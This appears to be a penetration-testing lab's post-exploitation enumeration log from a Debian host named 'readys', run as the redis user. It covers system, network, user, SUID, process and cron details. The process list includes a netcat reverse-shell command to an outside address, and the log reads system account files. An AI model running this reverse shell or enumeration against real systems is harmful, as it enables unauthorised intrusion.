System/Kernel
redis@readys:~$ uname -a ; cat /etc/*release
Linux readys 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
4.19.0-18-amd64
x86_64
Debian GNU/Linux 10 (buster)
Networks
redis@readys:~$ ip route ; arp -a
Cannot open netlink socket: Address family not supported by protocol
? (192.168.154.254) at 00:50:56:9e:0f:31 [ether] on ens192
redis@readys:~$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN 1277/redis-server 0
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 141 192.168.154.166:41060 192.168.45.218:9999 ESTABLISHED 1487/nc
tcp 0 0 192.168.154.166:6379 192.168.45.218:35254 ESTABLISHED 1277/redis-server 0
udp 0 0 0.0.0.0:60011 0.0.0.0:* -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
Users & Groups
redis@readys:~$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
ls: cannot open directory '/home': Permission denied
alice:x:1000:1000::/home/alice:/bin/bash
redis@readys:~$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(mysql) gid=112(mysql) groups=112(mysql)
uid=107(redis) gid=114(redis) groups=114(redis)
uid=1000(alice) gid=1000(alice) groups=1000(alice)
uid=107(redis) gid=114(redis) groups=114(redis)
uid=1000(alice) gid=1000(alice) groups=1000(alice)
SUIDs
redis@readys:~$ find / -perm -04000 -ls -type f 2>/dev/null
273373 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
276719 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
398815 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
266035 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
262183 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
265710 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
280578 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
266037 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
262179 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
262180 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
265563 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
272496 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
262182 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
SGIDs
redis@readys:~$ find / -perm -02000 -ls -type f 2>/dev/null
395189 4 drwxrwsr-x 3 root staff 4096 Oct 20 2020 /usr/local/lib/python3.7
395191 4 drwxrwsr-x 2 root staff 4096 Oct 20 2020 /usr/local/lib/python3.7/dist-packages
398844 4 drwxrwsr-x 4 root staff 4096 Oct 20 2020 /usr/local/lib/python2.7
399799 4 drwxrwsr-x 2 root staff 4096 Oct 20 2020 /usr/local/lib/python2.7/site-packages
398845 4 drwxrwsr-x 2 root staff 4096 Oct 20 2020 /usr/local/lib/python2.7/dist-packages
262984 40 -rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd
273564 20 -rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
262181 32 -rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry
276712 316 -rwxr-sr-x 1 root ssh 321672 Jan 31 2020 /usr/bin/ssh-agent
268064 16 -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
262178 72 -rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
268184 44 -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
263608 36 -rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall
36437 0 drwxr-sr-x 2 redis redis 60 Mar 31 05:09 /run/redis
11102 0 drwxr-sr-x 3 root systemd-journal 60 Mar 31 04:12 /run/log/journal
11103 0 drwxr-s--- 2 root systemd-journal 60 Mar 31 04:12 /run/log/journal/dfeea3a38b804ead8bd9a54e8c7e2bad
655538 4 drwxrwsr-x 2 root staff 4096 Sep 19 2020 /var/local
655584 4 drwxrwsr-x 2 root mail 4096 Oct 20 2020 /var/mail
663808 4 drwxr-s--- 2 mysql adm 4096 Aug 3 2024 /var/log/mysql
664211 4 drwxr-s--- 2 redis adm 4096 Aug 3 2024 /var/log/redis
664211 4 drwxr-s--- 2 redis adm 4096 Aug 3 2024 /var/log/redis
Capabilities
redis@readys:~$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
Processes
redis@readys:~$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.4 103804 9876 ? Ss 04:12 0:00 /sbin/init
root 256 0.0 0.4 24012 8224 ? Ss 04:12 0:00 /lib/systemd/systemd-journald
root 273 0.0 0.2 22204 5168 ? Ss 04:12 0:00 /lib/systemd/systemd-udevd
systemd+ 393 0.0 0.3 93084 6456 ? Ssl 04:12 0:00 /lib/systemd/systemd-timesyncd
root 394 0.0 0.5 48228 10804 ? Ss 04:12 0:00 /usr/bin/VGAuthService
root 396 0.0 0.5 122868 12168 ? Ssl 04:12 0:02 /usr/bin/vmtoolsd
root 407 0.0 0.3 19308 6432 ? Ss 04:12 0:00 /lib/systemd/systemd-logind
root 409 0.0 0.1 8504 2804 ? Ss 04:12 0:00 /usr/sbin/cron -f
message+ 410 0.0 0.2 9140 4444 ? Ss 04:12 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 411 0.0 0.2 225824 4272 ? Ssl 04:12 0:00 /usr/sbin/rsyslogd -n -iNONE
root 461 0.0 0.0 5612 1672 ? Ss+ 04:12 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 467 0.0 0.3 15852 7172 ? Ss 04:12 0:00 /usr/sbin/sshd -D
mysql 525 0.0 4.5 1257600 93304 ? Ssl 04:12 0:01 /usr/sbin/mysqld
root 526 0.0 0.9 197392 20312 ? Ss 04:12 0:00 /usr/sbin/apache2 -k start
alice 914 0.0 1.7 200692 35896 ? S 04:25 0:00 /usr/sbin/apache2 -k start
alice 956 0.0 0.7 197748 15344 ? S 04:33 0:00 /usr/sbin/apache2 -k start
alice 1015 0.0 0.7 197768 15228 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1020 0.0 0.7 197748 15456 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1023 0.0 1.2 200296 24980 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1027 0.0 1.1 198248 22700 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1046 0.0 0.7 197768 15228 ? S 04:35 0:00 /usr/sbin/apache2 -k start
alice 1050 0.0 0.8 197748 18160 ? S 04:35 0:00 /usr/sbin/apache2 -k start
alice 1052 0.0 0.7 197768 15640 ? S 04:35 0:00 /usr/sbin/apache2 -k start
alice 1060 0.0 1.1 198248 22892 ? S 04:35 0:00 /usr/sbin/apache2 -k start
redis 1277 0.0 0.4 51684 9736 ? Ssl 05:09 0:01 /usr/bin/redis-server 0.0.0.0:6379
redis 1482 0.0 0.0 2388 756 ? S 05:39 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.218 9999 >/tmp/f
redis 1485 0.0 0.0 5400 744 ? S 05:39 0:00 cat /tmp/f
redis 1486 0.0 0.1 6992 3736 ? S 05:39 0:00 bash -i
redis 1487 0.0 0.0 2372 1784 ? S 05:39 0:00 nc 192.168.45.218 9999
redis 1551 0.0 0.1 10916 3128 ? R 05:42 0:00 ps -auxwww
root 409 0.0 0.1 8504 2804 ? Ss 04:12 0:00 /usr/sbin/cron -f
mysql 525 0.0 4.5 1257600 93304 ? Ssl 04:12 0:01 /usr/sbin/mysqld
alice 914 0.0 1.7 200692 35896 ? S 04:25 0:00 /usr/sbin/apache2 -k start
Cron & Systemd
redis@readys:~$ crontab -l ; cat /etc/crontab ; systemctl list-timers
crontabs/redis/: fopen: Permission denied
*/3 * * * * root /usr/local/bin/backup.sh
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2025-03-31 06:05:03 EDT 21min left Mon 2025-03-31 04:12:19 EDT 1h 31min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2025-03-31 06:09:00 EDT 25min left Mon 2025-03-31 05:39:00 EDT 4min 49s ago phpsessionclean.timer phpsessionclean.service
Mon 2025-03-31 08:02:20 EDT 2h 18min left Mon 2025-03-31 04:12:19 EDT 1h 31min ago apt-daily.timer apt-daily.service
Tue 2025-04-01 00:00:00 EDT 18h left Mon 2025-03-31 04:12:19 EDT 1h 31min ago logrotate.timer logrotate.service
Tue 2025-04-01 00:00:00 EDT 18h left Mon 2025-03-31 04:12:19 EDT 1h 31min ago man-db.timer man-db.service
Tue 2025-04-01 04:28:10 EDT 22h left Mon 2025-03-31 04:28:10 EDT 1h 15min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
6 timers listed.
Pass --all to see loaded but inactive timers, too.
*/3 * * * * root /usr/local/bin/backup.sh
Services
redis@readys:~$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
mariadb.service loaded active running MariaDB 10.3.31 database server
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
redis-server.service loaded active running Advanced key-value store
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
23 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
apache2.service
mariadb.service
redis-server.service
Sudo Version
redis@readys:~$ sudo --version
sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges?
?
Glibc Version
redis@readys:~$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
ldd (Debian GLIBC 2.28-10) 2.28